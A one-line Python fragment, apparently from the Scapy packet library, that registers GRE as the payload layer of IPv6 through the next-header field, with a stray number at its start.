4234bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)